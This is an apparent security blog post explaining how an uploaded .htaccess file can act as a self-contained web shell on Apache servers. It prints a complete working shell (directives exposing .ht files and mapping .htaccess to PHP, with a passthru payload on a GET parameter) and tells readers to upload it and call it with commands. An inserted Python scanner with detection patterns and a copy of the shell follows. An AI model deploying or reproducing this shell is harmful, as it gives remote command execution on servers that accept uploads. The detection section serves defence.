Attacking webservers via .HTACCESS

Source: Internet
Author: User

A while back I was testing a CMS that had a curious feature: all uploaded files were placed in their own directory. This was not a security enhancement, as the application allowed PHP files to be uploaded. However, I couldn't help asking: what if PHP uploads had been restricted? The answer was .htaccess files. Using SetHandler in a .htaccess file is well known, but does not lead to remote code execution. So after some thinking I put together some self-contained .htaccess web shells. I wrote both a PHP and a server-side include shell, but other options can easily be added (JSP, mod_perl, etc.).

This works by first diverting the default Apache .htaccess access restriction from within the .htaccess file itself, so we can access it as a URL. Next we reconfigure the .htaccess extension to be treated as a dynamic content script, and finally we have our payload. The attack works because .htaccess parsing and processing for Apache configuration directives occur before the .htaccess file is processed as a web request. There is a relatively small gotcha: the payload has to be commented out with a # at the start so it doesn't get interpreted by Apache, and likewise the script interpreter must ignore the Apache directives. PHP lends itself well to this, as any content not within the <?php ?> tags is presented as is.


# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
# Make .htaccess file be interpreted as php file. This occurs after apache has interpreted
# the apache directives from the .htaccess file
AddType application/x-httpd-php .htaccess
###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
###### LLEHS ######
Simply upload the preferred shell as a .htaccess file and then visit the .htaccess file via the URL http://domain/path/.htaccess?c=command for remote code execution. The collection of attack files is accessible from my github htshells repository.
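As a defensive counterpart to the three steps above, here is an added example (not from the post or the htshells project) that scans an upload directory for .htaccess bodies that expose .ht* files, remap .htaccess to a script handler, or carry a script payload. The sample contents are constructed and the upload directory path passed to scan_tree() is assumed.

```python
"""Flag uploaded .htaccess files showing the htshells pattern (exposing .ht*
files, remapping .htaccess to a script handler, carrying a payload).
Added example, not from the post or the htshells project; samples are constructed."""
import re
from pathlib import Path

# One check per step described in the post, plus the payload itself.
CHECKS = [
    ("exposes .ht* files", re.compile(r"<Files(Match)?\b[^>]*\\\.ht", re.I)),
    ("grants access to everyone",
     re.compile(r"^\s*(Allow from all|Require all granted)\b", re.I | re.M)),
    ("maps .htaccess to a script handler",
     re.compile(r"^\s*(AddType|AddHandler)\s+\S+\s+.*\.htaccess\b", re.I | re.M)),
    ("embedded script payload", re.compile(r"<\?php|<!--#exec", re.I)),
]

def scan_htaccess(text):
    """Return the names of every check that matches one .htaccess body."""
    return [name for name, rx in CHECKS if rx.search(text)]

def is_htshell(text):
    """Handler remap plus payload is the signature; exposure alone is not."""
    hits = set(scan_htaccess(text))
    return {"maps .htaccess to a script handler", "embedded script payload"} <= hits

def scan_tree(root):
    """Walk an (assumed) upload directory; return {path: findings} for hits only."""
    return {str(p): hits for p in Path(root).rglob(".htaccess")
            if (hits := scan_htaccess(p.read_text(errors="replace")))}

# Constructed sample modelled on the shell shown in the post.
MALICIOUS_SAMPLE = """\
<Files ~ "^\\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
###### SHELL ###### <?php echo "\\n";passthru($_GET['c']." 2>&1"); ?>
"""

# Constructed benign sample. AllowOverride None on the upload directory in
# httpd.conf makes any uploaded .htaccess inert; this scan matters only where overrides are on.
BENIGN_SAMPLE = """\
Options -Indexes
php_flag engine off
<FilesMatch "\\.(php|phtml)$">
Require all denied
</FilesMatch>
"""
```

Run scan_tree() over a copy of the upload directory and review every path it returns; a hit on the handler remap plus payload checks is the pattern the post describes.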

Update: Due to the large number of comments on this post I have created more project information including a FAQ and tutorial under the project page.
